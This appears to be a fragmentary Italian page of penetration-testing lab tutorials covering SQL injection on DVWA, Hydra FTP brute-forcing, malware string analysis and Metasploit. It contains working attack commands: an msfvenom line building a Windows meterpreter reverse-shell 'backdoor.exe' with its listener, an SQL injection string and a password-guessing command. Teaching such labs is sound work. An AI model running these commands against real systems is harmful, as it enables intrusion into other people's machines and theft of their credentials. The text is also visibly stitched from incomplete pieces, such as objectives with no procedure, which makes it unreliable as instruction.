Molte persone usano password basate su parole di senso compiuto, nomi o date di nascita. Questo le rende estremamente vulnerabili, anche se la password ha 6–8 caratteri.
Vediamo due esempi concreti:
John the Ripper è uno strumento open source per il recupero di password e il test di robustezza delle credenziali. In questo esempio vedremo come usarlo per recuperare la password di un file PDF protetto, in modo legale ed etico.
Obiettivo: Eseguire una SQL Injection avanzata bypassando un Web Application Firewall (WAF).
DVWA (Damn Vulnerable Web App) con ModSecurity attivo.
Commenti SQL (/**/)
Obiettivo: Ottenere un Golden Ticket per impersonare un amministratore di dominio in un ambiente Active Directory.
Impacket (su Kali Linux)
Mimikatz (su Windows)
Active Directory lab (es. Windows Server 2019 + Windows 10 client)
Immunity Debugger (Windows)
Kali Linux (per generare l’exploit)
Mona.py (plugin per Immunity Debugger)
Metasploit Framework
Genera un payload per Windows con msfvenom (parte di Metasploit):
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<tuo-IP> LPORT=4444 -f exe > backdoor.exe
Avvia un listener su Kali Linux con Metasploit:
msfconsoleuse exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset LHOST <tuo-IP>set LPORT 4444exploit
Scarica un file sospetto (es. da MalwareBazaar, solo per scopi didattici!).
Esegui:
strings <nome-file> | less
Cerca indirizzi IP, URL, comandi sospetti o altre informazioni.
Usa DVWA (Damn Vulnerable Web App) su Metasploitable.
Procedura:
Accedi a DVWA (http://<indirizzo-IP-target>/dvwa) e loggati.
Vai alla sezione "SQL Injection".
Inserisci nel campo di input:
' OR '1'='1
Assicurati di avere un server FTP vulnerabile (es. su Metasploitable).
Crea o scarica una wordlist (es. rockyou.txt su Kali Linux).
Esegui Hydra:
hydra -l <username> -P <percorso-wordlist> ftp://<indirizzo-IP-target>
Se il login ha successo, prova ad accedere manualmente con:
Innanzitutto è sempre utile richiamare due principi di base:
l'esercizio è solo ad uso didattico
deve essere effettuato sempre su una nostra macchina virtuale
Dopo aver avviato la macchina virtuale:
troviamo il suo IP con il comando ip route o se vuoi più dettagli ip addr show
WebGoat è un'applicazione web Java volutamente vulnerabile creata da OWASP, pensata per l'insegnamento della sicurezza delle applicazioni web.
Funzionalità principali
sqlmap è uno strumento open source per rilevare e sfruttare automaticamente vulnerabilità di SQL injection nei database. È pensato per automatizzare il processo di rilevamento e sfruttamento, ed è utilizzato frequentemente nei penetration test web.
Funzionalità principali
